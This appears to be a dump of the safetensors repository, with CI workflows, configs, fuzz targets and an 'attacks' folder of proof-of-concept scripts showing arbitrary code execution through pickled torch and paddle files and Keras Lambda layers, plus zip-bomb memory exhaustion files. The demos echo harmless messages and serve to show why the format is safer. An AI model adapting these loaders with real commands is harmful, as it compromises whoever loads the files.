├── codecov.yaml ├── codecov.yml ├── safetensors ├── LICENSE ├── README.md ├── fuzz │ ├── .gitignore │ ├── fuzz_targets │ │ └── fuzz_target_1.rs │ └── Cargo.toml ├── src │ └── lib.rs ├── Cargo.toml └── benches │ └── benchmark.rs ├── bindings └── python │ ├── tests │ ├── data │ │ └── __init__.py │ ├── test_handle.py │ ├── test_mlx_comparison.py │ ├── test_flax_comparison.py │ ├── test_tf_comparison.py │ ├── test_threadable.py │ ├── test_paddle_comparison.py │ └── test_pt_model.py │ ├── py_src │ └── safetensors │ │ ├── py.typed │ │ ├── __init__.py │ │ ├── flax.py │ │ ├── mlx.py │ │ ├── tensorflow.py │ │ ├── __init__.pyi │ │ ├── numpy.py │ │ └── paddle.py │ ├── MANIFEST.in │ ├── Cargo.toml │ ├── fuzz.py │ ├── .gitignore │ ├── README.md │ ├── setup.cfg │ ├── Makefile │ ├── convert_all.py │ ├── benches │ ├── test_paddle.py │ ├── test_flax.py │ ├── test_mlx.py │ ├── test_tf.py │ └── test_pt.py │ ├── pyproject.toml │ ├── src │ └── view.rs │ └── stub.py ├── .github ├── ISSUE_TEMPLATE │ ├── config.yml │ ├── feature-request.yml │ └── bug-report.yml ├── conda │ ├── bld.bat │ ├── build.sh │ └── meta.yaml ├── workflows │ ├── delete_doc_comment_trigger.yml │ ├── delete_doc_comment.yml │ ├── trufflehog.yml │ ├── stale.yml │ ├── upload_pr_documentation.yml │ ├── build_documentation.yml │ ├── build_pr_documentation.yml │ ├── rust-release.yml │ ├── codecov.yml │ ├── rust.yml │ ├── python-bench.yml │ ├── python-release-conda.yml │ ├── python-release.yml │ └── python.yml ├── stale.yml └── PULL_REQUEST_TEMPLATE.md ├── .dockerignore ├── Makefile ├── attacks ├── tf_safe_ace_get_pwned.py ├── torch_ace_get_pwned.py ├── paddle_ace_get_pwned.py ├── numpy_dos_create.py ├── tf_safe_ace_create.py ├── numpy_dos_get_pwned.py ├── torch_dos_get_pwned.py ├── tf_ace_get_pwned.py ├── tf_ace_create.py ├── torch_ace_create.py ├── safetensors_abuse_attempt_1.py ├── torch_dos_create.py ├── safetensors_abuse_attempt_3.py ├── safetensors_abuse_attempt_2.py ├── paddle_ace_create.py └── README.md ├── .gitignore ├── docs ├── source │ ├── api │ │ ├── flax.mdx │ │ ├── numpy.mdx │ │ ├── paddle.mdx │ │ ├── tensorflow.mdx │ │ └── torch.mdx │ ├── _toctree.yml │ ├── convert-weights.md │ ├── speed.mdx │ ├── index.mdx │ ├── torch_shared_tensors.mdx │ └── metadata_parsing.mdx └── safetensors.schema.json ├── flake.lock ├── flake.nix ├── Dockerfile.s390x.test ├── .pre-commit-config.yaml ├── RELEASE.md └── README.md /codecov.yaml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /codecov.yml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /safetensors/LICENSE: -------------------------------------------------------------------------------- 1 | ../LICENSE -------------------------------------------------------------------------------- /safetensors/README.md: -------------------------------------------------------------------------------- 1 | ../README.md -------------------------------------------------------------------------------- /bindings/python/tests/data/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/py.typed: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /safetensors/fuzz/.gitignore: -------------------------------------------------------------------------------- 1 | target 2 | corpus 3 | artifacts 4 | coverage 5 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | blank_issues_enabled: true 2 | version: 2.1 3 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | safetensors/target 2 | bindings/python/target 3 | Dockerfile.s390x.test 4 | -------------------------------------------------------------------------------- /.github/conda/bld.bat: -------------------------------------------------------------------------------- 1 | cd bindings\python 2 | %PYTHON% -m pip install . --prefix=%PREFIX% 3 | -------------------------------------------------------------------------------- /.github/conda/build.sh: -------------------------------------------------------------------------------- 1 | cd bindings/python 2 | $PYTHON -m pip install . --prefix=$PREFIX 3 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | doc: 2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd .. 3 | -------------------------------------------------------------------------------- /attacks/tf_safe_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | new_model = tf.keras.models.load_model("tf_ace.keras") 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | safetensors/**/Cargo.lock 3 | bindings/python/Cargo.lock 4 | *.bin 5 | *.h5 6 | *.msgpack 7 | *.pt 8 | *.pdparams 9 | *.safetensors 10 | *.npz 11 | -------------------------------------------------------------------------------- /docs/source/api/flax.mdx: -------------------------------------------------------------------------------- 1 | # Flax API 2 | 3 | [[autodoc]] safetensors.flax.load_file 4 | [[autodoc]] safetensors.flax.load 5 | [[autodoc]] safetensors.flax.save_file 6 | [[autodoc]] safetensors.flax.save 7 | -------------------------------------------------------------------------------- /docs/source/api/numpy.mdx: -------------------------------------------------------------------------------- 1 | # Numpy API 2 | 3 | [[autodoc]] safetensors.numpy.load_file 4 | [[autodoc]] safetensors.numpy.load 5 | [[autodoc]] safetensors.numpy.save_file 6 | [[autodoc]] safetensors.numpy.save 7 | -------------------------------------------------------------------------------- /docs/source/api/paddle.mdx: -------------------------------------------------------------------------------- 1 | # PaddlePaddle API 2 | 3 | [[autodoc]] safetensors.paddle.load_file 4 | [[autodoc]] safetensors.paddle.load 5 | [[autodoc]] safetensors.paddle.save_file 6 | [[autodoc]] safetensors.paddle.save 7 | -------------------------------------------------------------------------------- /attacks/torch_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import torch 2 | 3 | weights = 
torch.load("torch_ace.pt") 4 | assert list(weights.keys()) == ["weight"] 5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2))) 6 | print("The file looks fine !") 7 | -------------------------------------------------------------------------------- /docs/source/api/tensorflow.mdx: -------------------------------------------------------------------------------- 1 | # Tensorflow API 2 | 3 | [[autodoc]] safetensors.tensorflow.load_file 4 | [[autodoc]] safetensors.tensorflow.load 5 | [[autodoc]] safetensors.tensorflow.save_file 6 | [[autodoc]] safetensors.tensorflow.save 7 | -------------------------------------------------------------------------------- /safetensors/fuzz/fuzz_targets/fuzz_target_1.rs: -------------------------------------------------------------------------------- 1 | #![no_main] 2 | 3 | use libfuzzer_sys::fuzz_target; 4 | use safetensors::tensor::SafeTensors; 5 | 6 | fuzz_target!(|data: &[u8]| { 7 | let _ = SafeTensors::deserialize(data); 8 | }); 9 | -------------------------------------------------------------------------------- /bindings/python/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include Cargo.toml 2 | include pyproject.toml 3 | include rust-toolchain 4 | include ../../LICENSE 5 | recursive-include src * 6 | recursive-include safetensors-lib * 7 | recursive-exclude safetensors-lib/target * 8 | -------------------------------------------------------------------------------- /attacks/paddle_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import paddle 2 | 3 | weights = paddle.load("paddle_ace.pdparams")[0] 4 | assert list(weights.keys()) == ["weight"] 5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2))) 6 | print("The file looks fine !") 7 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/__init__.py: -------------------------------------------------------------------------------- 1 | # Re-export this 2 | from ._safetensors_rust import ( # noqa: F401 3 | SafetensorError, 4 | __version__, 5 | deserialize, 6 | safe_open, 7 | _safe_open_handle, 8 | serialize, 9 | serialize_file, 10 | ) 11 | -------------------------------------------------------------------------------- /docs/source/api/torch.mdx: -------------------------------------------------------------------------------- 1 | # Torch API 2 | 3 | [[autodoc]] safetensors.torch.load_file 4 | [[autodoc]] safetensors.torch.load 5 | [[autodoc]] safetensors.torch.save_file 6 | [[autodoc]] safetensors.torch.save 7 | [[autodoc]] safetensors.torch.load_model 8 | [[autodoc]] safetensors.torch.save_model 9 | -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment_trigger.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment trigger 2 | 3 | on: 4 | pull_request: 5 | types: [ closed ] 6 | 7 | jobs: 8 | delete: 9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main 10 | with: 11 | pr_number: ${{ github.event.number }} -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Delete doc comment trigger"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | delete: 
11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main 12 | secrets: 13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /attacks/numpy_dos_create.py: -------------------------------------------------------------------------------- 1 | from zipfile import ZIP_DEFLATED, ZipFile 2 | 3 | FILESIZE = 40 * 1000 # 40 Go 4 | BUFFER = b"\0" * 1000 * 1000 # 1Mo 5 | 6 | outfilename = "numpy_dos.npz" 7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: 8 | with outzip.open("weights.npy", "w", force_zip64=True) as f: 9 | for i in range(FILESIZE): 10 | f.write(BUFFER) 11 | -------------------------------------------------------------------------------- /.github/workflows/trufflehog.yml: -------------------------------------------------------------------------------- 1 | on: 2 | push: 3 | 4 | name: Secret Leaks 5 | 6 | jobs: 7 | trufflehog: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - name: Checkout code 11 | uses: actions/checkout@v6 12 | with: 13 | fetch-depth: 0 14 | - name: Secret Scanning 15 | uses: trufflesecurity/trufflehog@main 16 | with: 17 | extra_args: --results=verified,unknown 18 | 19 | 20 | -------------------------------------------------------------------------------- /.github/workflows/stale.yml: -------------------------------------------------------------------------------- 1 | name: 'Close stale issues and PRs' 2 | on: 3 | schedule: 4 | - cron: '30 1 * * *' 5 | 6 | jobs: 7 | stale: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - uses: actions/stale@v10 11 | with: 12 | stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' 13 | days-before-stale: 30 14 | days-before-close: 5 15 | -------------------------------------------------------------------------------- /.github/workflows/upload_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Upload PR Documentation 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Build PR Documentation"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | build: 11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main 12 | with: 13 | package_name: safetensors 14 | secrets: 15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /attacks/tf_safe_ace_create.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | 4 | def exec_(*args, **kwargs): 5 | import os 6 | 7 | os.system('echo "########################################\nI own you.\n########################################"') 8 | return 10 9 | 10 | 11 | num_classes = 10 12 | input_shape = (28, 28, 1) 13 | 14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) 15 | 16 | 17 | model.save("tf_ace.keras", save_format="keras_v3") 18 | -------------------------------------------------------------------------------- /attacks/numpy_dos_get_pwned.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import numpy as np 4 | 5 | filename = "numpy_dos.npz" 6 | 7 | print( 8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." 
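    # Note: the small on-disk size printed above is misleading -- numpy_dos_create.py
    # packed roughly 40 GB of zero bytes into this .npz with ZIP_DEFLATED, so reading
    # the array back will try to materialize the full decompressed payload in RAM.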
9 | ) 10 | print("Be careful this might crash your computer by reserving way too much RAM") 11 | input("Press Enter to continue") 12 | archive = np.load(filename) 13 | weights = archive["weight"] 14 | assert np.allclose(weights, np.zeros((2, 2))) 15 | print("The file looks fine !") 16 | -------------------------------------------------------------------------------- /bindings/python/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors-python" 3 | version = "0.7.0-dev.0" 4 | edition = "2021" 5 | rust-version = "1.74" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | [lib] 9 | name = "safetensors_rust" 10 | crate-type = ["cdylib"] 11 | 12 | [dependencies] 13 | pyo3 = { version = "0.25", features = ["abi3", "abi3-py38"] } 14 | memmap2 = "0.9" 15 | serde_json = "1.0" 16 | 17 | [dependencies.safetensors] 18 | path = "../../safetensors" 19 | -------------------------------------------------------------------------------- /attacks/torch_dos_get_pwned.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import torch 4 | 5 | filename = "torch_dos.pt" 6 | 7 | print( 8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." 9 | ) 10 | print("Be careful this might crash your computer by reserving way too much RAM") 11 | input("Press Enter to continue") 12 | weights = torch.load(filename) 13 | assert list(weights.keys()) == ["weight"] 14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2))) 15 | print("The file looks fine !") 16 | -------------------------------------------------------------------------------- /safetensors/fuzz/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors-fuzz" 3 | version = "0.0.0" 4 | publish = false 5 | edition = "2021" 6 | 7 | [package.metadata] 8 | cargo-fuzz = true 9 | 10 | [dependencies] 11 | libfuzzer-sys = "0.4" 12 | 13 | [dependencies.safetensors] 14 | path = ".." 
15 | 16 | # Prevent this from interfering with workspaces 17 | [workspace] 18 | members = ["."] 19 | 20 | [profile.release] 21 | debug = 1 22 | 23 | [[bin]] 24 | name = "fuzz_target_1" 25 | path = "fuzz_targets/fuzz_target_1.rs" 26 | test = false 27 | doc = false 28 | -------------------------------------------------------------------------------- /attacks/tf_ace_get_pwned.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import json 3 | 4 | import h5py 5 | import tensorflow as tf 6 | 7 | new_model = tf.keras.models.load_model("tf.h5") 8 | 9 | print("Transformers is not vulnerable to this, as it uses h5 directly.") 10 | print("Keras uses a pickled code of the function within the `h5` attrs of the file") 11 | print("Let's show you the marshalled code") 12 | 13 | with h5py.File("tf_ace.h5") as f: 14 | data = json.loads(f.attrs["model_config"]) 15 | print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0])) 16 | pass 17 | -------------------------------------------------------------------------------- /attacks/tf_ace_create.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | 4 | def exec_(*args, **kwargs): 5 | import os 6 | 7 | os.system('echo "########################################\nI own you.\n########################################"') 8 | return 10 9 | 10 | 11 | num_classes = 10 12 | input_shape = (28, 28, 1) 13 | 14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) 15 | 16 | 17 | ### 18 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"]) 19 | 20 | model.save("tf_ace.h5") 21 | ### 22 | -------------------------------------------------------------------------------- /.github/conda/meta.yaml: -------------------------------------------------------------------------------- 1 | {% set name = "safetensors" %} 2 | 3 | package: 4 | name: "{{ name|lower }}" 5 | version: "{{ SAFETENSORS_VERSION }}" 6 | 7 | source: 8 | path: ../../ 9 | 10 | requirements: 11 | host: 12 | - pip 13 | - python x.x 14 | - setuptools 15 | - setuptools-rust 16 | - maturin 17 | 18 | run: 19 | - python x.x 20 | 21 | test: 22 | imports: 23 | - safetensors 24 | 25 | about: 26 | home: https://huggingface.co/docs/safetensors 27 | license: Apache License 2.0 28 | license_file: LICENSE 29 | summary: "Safe and portable way of storing tensors" 30 | -------------------------------------------------------------------------------- /attacks/torch_ace_create.py: -------------------------------------------------------------------------------- 1 | import torch 2 | 3 | 4 | class BadDict(dict): 5 | def __init__(self, src: str, **kwargs): 6 | super().__init__(**kwargs) 7 | self.src = src 8 | 9 | def __reduce__(self): 10 | return ( 11 | eval, 12 | (f"os.system('{self.src}') or dict()",), 13 | None, 14 | None, 15 | iter(self.items()), 16 | ) 17 | 18 | 19 | torch.save( 20 | BadDict( 21 | 'echo "pwned your computer, I can do anything I want."', 22 | **{"weight": torch.zeros((2, 2))}, 23 | ), 24 | "torch_ace.pt", 25 | ) 26 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_1.py: -------------------------------------------------------------------------------- 1 | import torch 2 | from safetensors.torch import load_file, save_file 3 | 4 | filename = "safetensors_abuse_attempt_1.safetensors" 5 | 6 | 7 | def create_payload(): 8 | weights = 
{"weight": torch.zeros((2, 2))} 9 | save_file(weights, filename) 10 | 11 | with open(filename, "r+b") as f: 12 | f.seek(0) 13 | # Now the header claims 2**32 - xx even though the file is small 14 | n = 1000 15 | n_bytes = n.to_bytes(8, "little") 16 | f.write(n_bytes) 17 | 18 | 19 | create_payload() 20 | # This properly crashes with an out of bounds exception. 21 | test = load_file(filename) 22 | -------------------------------------------------------------------------------- /flake.lock: -------------------------------------------------------------------------------- 1 | { 2 | "nodes": { 3 | "nixpkgs": { 4 | "locked": { 5 | "lastModified": 1730531603, 6 | "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=", 7 | "owner": "NixOS", 8 | "repo": "nixpkgs", 9 | "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d", 10 | "type": "github" 11 | }, 12 | "original": { 13 | "owner": "NixOS", 14 | "ref": "nixos-unstable", 15 | "repo": "nixpkgs", 16 | "type": "github" 17 | } 18 | }, 19 | "root": { 20 | "inputs": { 21 | "nixpkgs": "nixpkgs" 22 | } 23 | } 24 | }, 25 | "root": "root", 26 | "version": 7 27 | } 28 | -------------------------------------------------------------------------------- /docs/source/_toctree.yml: -------------------------------------------------------------------------------- 1 | - sections: 2 | - local: index 3 | title: 🤗 Safetensors 4 | - local: speed 5 | title: Speed Comparison 6 | - local: torch_shared_tensors 7 | title: Tensor Sharing in Pytorch 8 | - local: metadata_parsing 9 | title: Metadata Parsing 10 | - local: convert-weights 11 | title: Convert weights to safetensors 12 | title: Getting started 13 | - sections: 14 | - local: api/torch 15 | title: Torch API 16 | - local: api/tensorflow 17 | title: Tensorflow API 18 | - local: api/paddle 19 | title: PaddlePaddle API 20 | - local: api/flax 21 | title: Flax API 22 | - local: api/numpy 23 | title: Numpy API 24 | title: API 25 | -------------------------------------------------------------------------------- /.github/workflows/build_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build documentation 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | - doc-builder* 8 | - v*-release 9 | - use_templates 10 | 11 | jobs: 12 | build: 13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main 14 | with: 15 | commit_sha: ${{ github.sha }} 16 | package: safetensors 17 | notebook_folder: safetensors_doc 18 | package_path: safetensors/bindings/python/ 19 | version_tag_suffix: bindings/python/py_src/ 20 | install_rust: true 21 | secrets: 22 | token: ${{ secrets.HUGGINGFACE_PUSH }} 23 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 24 | -------------------------------------------------------------------------------- /.github/stale.yml: -------------------------------------------------------------------------------- 1 | # Number of days of inactivity before an issue becomes stale 2 | daysUntilStale: 60 3 | # Number of days of inactivity before a stale issue is closed 4 | daysUntilClose: 7 5 | # Issues with these labels will never be considered stale 6 | exemptLabels: 7 | - pinned 8 | - security 9 | # Label to use when marking an issue as stale 10 | staleLabel: wontfix 11 | # Comment to post when marking an issue as stale. Set to `false` to disable 12 | markComment: > 13 | This issue has been automatically marked as stale because it has not had 14 | recent activity. It will be closed if no further activity occurs. 
Thank you 15 | for your contributions. 16 | # Comment to post when closing a stale issue. Set to `false` to disable 17 | closeComment: false 18 | -------------------------------------------------------------------------------- /.github/workflows/build_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build PR Documentation 2 | 3 | on: 4 | pull_request: 5 | paths: 6 | - "docs/**" 7 | - "bindings/python/py_src/**" 8 | - ".github/workflows/build_pr_documentation.yml" 9 | 10 | concurrency: 11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }} 12 | cancel-in-progress: true 13 | 14 | jobs: 15 | build: 16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main 17 | with: 18 | commit_sha: ${{ github.event.pull_request.head.sha }} 19 | pr_number: ${{ github.event.number }} 20 | package: safetensors 21 | package_path: safetensors/bindings/python/ 22 | version_tag_suffix: bindings/python/py_src/ 23 | install_rust: true 24 | -------------------------------------------------------------------------------- /.github/workflows/rust-release.yml: -------------------------------------------------------------------------------- 1 | name: Rust Release 2 | 3 | env: 4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }} 5 | 6 | on: 7 | push: 8 | tags: 9 | - v* 10 | 11 | jobs: 12 | rust_publish: 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: Checkout repository 16 | uses: actions/checkout@v6 17 | 18 | - uses: dtolnay/rust-toolchain@stable 19 | - name: Cache Cargo Registry 20 | uses: actions/cache@v5 21 | with: 22 | path: ~/.cargo/registry 23 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }} 24 | 25 | - name: Publish package rust 26 | if: ${{ !contains(github.ref, 'rc') }} 27 | working-directory: ./safetensors 28 | run: cargo publish --token ${CRATES_TOKEN} 29 | 30 | -------------------------------------------------------------------------------- /attacks/torch_dos_create.py: -------------------------------------------------------------------------------- 1 | import os 2 | from zipfile import ZIP_DEFLATED, ZipFile 3 | 4 | import torch 5 | 6 | FILESIZE = 40 * 1000 # 40 Go 7 | BUFFER = b"\0" * 1000 * 1000 # 1 Mo 8 | 9 | filename = "torch_dos_tmp.pt" 10 | torch.save({"weight": torch.zeros((2, 2))}, filename) 11 | 12 | 13 | with ZipFile(filename, "r") as torch_zip: 14 | outfilename = "torch_dos.pt" 15 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: 16 | outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read()) 17 | outzip.writestr("archive/version", torch_zip.open("archive/version").read()) 18 | with outzip.open("archive/data/0", "w", force_zip64=True) as f: 19 | for i in range(FILESIZE): 20 | f.write(BUFFER) 21 | 22 | os.remove(filename) 23 | -------------------------------------------------------------------------------- /bindings/python/fuzz.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import sys 3 | import tempfile 4 | from collections import defaultdict 5 | 6 | import atheris 7 | 8 | 9 | with atheris.instrument_imports(): 10 | from safetensors.torch import load_file 11 | 12 | 13 | EXCEPTIONS = defaultdict(int) 14 | START = datetime.datetime.now() 15 | DT = datetime.timedelta(seconds=30) 16 | 17 | 18 | def TestOneInput(data): 19 | global START 20 | with tempfile.NamedTemporaryFile() as f: 21 | f.write(data) 22 | f.seek(0) 23 | try: 24 | load_file(f.name, device=0) 25 | except 
Exception as e: 26 | EXCEPTIONS[str(e)] += 1 27 | 28 | if datetime.datetime.now() - START > DT: 29 | for e, n in EXCEPTIONS.items(): 30 | print(e, n) 31 | START = datetime.datetime.now() 32 | 33 | 34 | atheris.Setup(sys.argv, TestOneInput) 35 | atheris.Fuzz() 36 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_3.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import json 3 | import os 4 | 5 | from safetensors.torch import load_file 6 | 7 | filename = "safetensors_abuse_attempt_2.safetensors" 8 | 9 | 10 | def create_payload(): 11 | shape = [200, 200] 12 | n = shape[0] * shape[1] * 4 13 | 14 | metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)} 15 | 16 | binary = json.dumps(metadata).encode("utf-8") 17 | n = len(binary) 18 | n_header = n.to_bytes(8, "little") 19 | 20 | with open(filename, "wb") as f: 21 | f.write(n_header) 22 | f.write(binary) 23 | f.write(b"\0" * n) 24 | 25 | 26 | create_payload() 27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") 28 | start = datetime.datetime.now() 29 | test = load_file(filename) 30 | print(f"Loading the file took {datetime.datetime.now() - start}") 31 | -------------------------------------------------------------------------------- /attacks/safetensors_abuse_attempt_2.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import json 3 | import os 4 | 5 | from safetensors.torch import load_file 6 | 7 | filename = "safetensors_abuse_attempt_2.safetensors" 8 | 9 | 10 | def create_payload(): 11 | shape = [2, 2] 12 | n = shape[0] * shape[1] * 4 13 | 14 | metadata = { 15 | f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10) 16 | } 17 | 18 | binary = json.dumps(metadata).encode("utf-8") 19 | n = len(binary) 20 | n_header = n.to_bytes(8, "little") 21 | 22 | with open(filename, "wb") as f: 23 | f.write(n_header) 24 | f.write(binary) 25 | f.write(b"\0" * n) 26 | 27 | 28 | create_payload() 29 | 30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") 31 | start = datetime.datetime.now() 32 | test = load_file(filename) 33 | print(f"Loading the file took {datetime.datetime.now() - start}") 34 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # What does this PR do? 2 | 3 | 12 | 13 | 14 | 15 | Fixes # (issue) or description of the problem this PR solves. 
16 | -------------------------------------------------------------------------------- /.github/workflows/codecov.yml: -------------------------------------------------------------------------------- 1 | name: Code coverage 2 | on: 3 | push: 4 | branches: 5 | - main 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | defaults: 11 | run: 12 | working-directory: ./safetensors 13 | 14 | steps: 15 | - uses: actions/checkout@v6 16 | 17 | - name: Install Rust Stable 18 | uses: dtolnay/rust-toolchain@stable 19 | with: 20 | components: llvm-tools-preview 21 | override: true 22 | 23 | - uses: Swatinem/rust-cache@v2 24 | 25 | - name: Install cargo-llvm-cov for Ubuntu 26 | run: cargo install cargo-llvm-cov 27 | 28 | - name: Coverage report 29 | run: cargo llvm-cov --release --lcov --output-path lcov.info 30 | 31 | - name: Upload to codecov.io 32 | uses: codecov/codecov-action@v5 33 | with: 34 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 35 | working-directory: ./safetensors 36 | fail_ci_if_error: true 37 | -------------------------------------------------------------------------------- /bindings/python/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | .pytest_cache/ 4 | *.py[cod] 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | .venv/ 12 | env/ 13 | bin/ 14 | build/ 15 | develop-eggs/ 16 | dist/ 17 | eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | include/ 24 | man/ 25 | venv/ 26 | *.egg-info/ 27 | .installed.cfg 28 | *.egg 29 | 30 | # Installer logs 31 | pip-log.txt 32 | pip-delete-this-directory.txt 33 | pip-selfcheck.json 34 | 35 | # Unit test / coverage reports 36 | htmlcov/ 37 | .tox/ 38 | .coverage 39 | .cache 40 | nosetests.xml 41 | coverage.xml 42 | 43 | # Translations 44 | *.mo 45 | 46 | # Mr Developer 47 | .mr.developer.cfg 48 | .project 49 | .pydevproject 50 | 51 | # Rope 52 | .ropeproject 53 | 54 | # Django stuff: 55 | *.log 56 | *.pot 57 | 58 | .DS_Store 59 | 60 | # Sphinx documentation 61 | docs/_build/ 62 | 63 | # PyCharm 64 | .idea/ 65 | 66 | # VSCode 67 | .vscode/ 68 | 69 | # Pyenv 70 | .python-version 71 | -------------------------------------------------------------------------------- /flake.nix: -------------------------------------------------------------------------------- 1 | { 2 | inputs = { 3 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; 4 | }; 5 | 6 | outputs = 7 | { nixpkgs, ... 
}: 8 | let 9 | forAllSystems = nixpkgs.lib.genAttrs [ 10 | "aarch64-linux" 11 | "x86_64-linux" 12 | "aarch64-darwin" 13 | ]; 14 | in 15 | { 16 | devShells = forAllSystems ( 17 | system: 18 | let 19 | pkgs = nixpkgs.legacyPackages.${system}; 20 | in 21 | { 22 | default = pkgs.mkShell { 23 | buildInputs = with pkgs; [ 24 | rustup 25 | python3Packages.python 26 | python3Packages.venvShellHook 27 | ]; 28 | venvDir = "./.venv"; 29 | postVenvCreation = '' 30 | unset SOURCE_DATE_EPOCH 31 | ''; 32 | postShellHook = '' 33 | unset SOURCE_DATE_EPOCH 34 | ''; 35 | LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib"; 36 | }; 37 | 38 | } 39 | ); 40 | }; 41 | } 42 | -------------------------------------------------------------------------------- /bindings/python/README.md: -------------------------------------------------------------------------------- 1 | ## Installation 2 | 3 | ``` 4 | pip install safetensors 5 | ``` 6 | 7 | 8 | ## Usage 9 | 10 | ### Numpy 11 | 12 | ```python 13 | from safetensors.numpy import save_file, load_file 14 | import numpy as np 15 | 16 | tensors = { 17 | "a": np.zeros((2, 2)), 18 | "b": np.zeros((2, 3), dtype=np.uint8) 19 | } 20 | 21 | save_file(tensors, "./model.safetensors") 22 | 23 | 24 | # Now loading 25 | loaded = load_file("./model.safetensors") 26 | ``` 27 | 28 | ### Torch 29 | 30 | ```python 31 | from safetensors.torch import save_file, load_file 32 | import torch 33 | 34 | tensors = { 35 | "a": torch.zeros((2, 2)), 36 | "b": torch.zeros((2, 3), dtype=torch.uint8) 37 | } 38 | 39 | save_file(tensors, 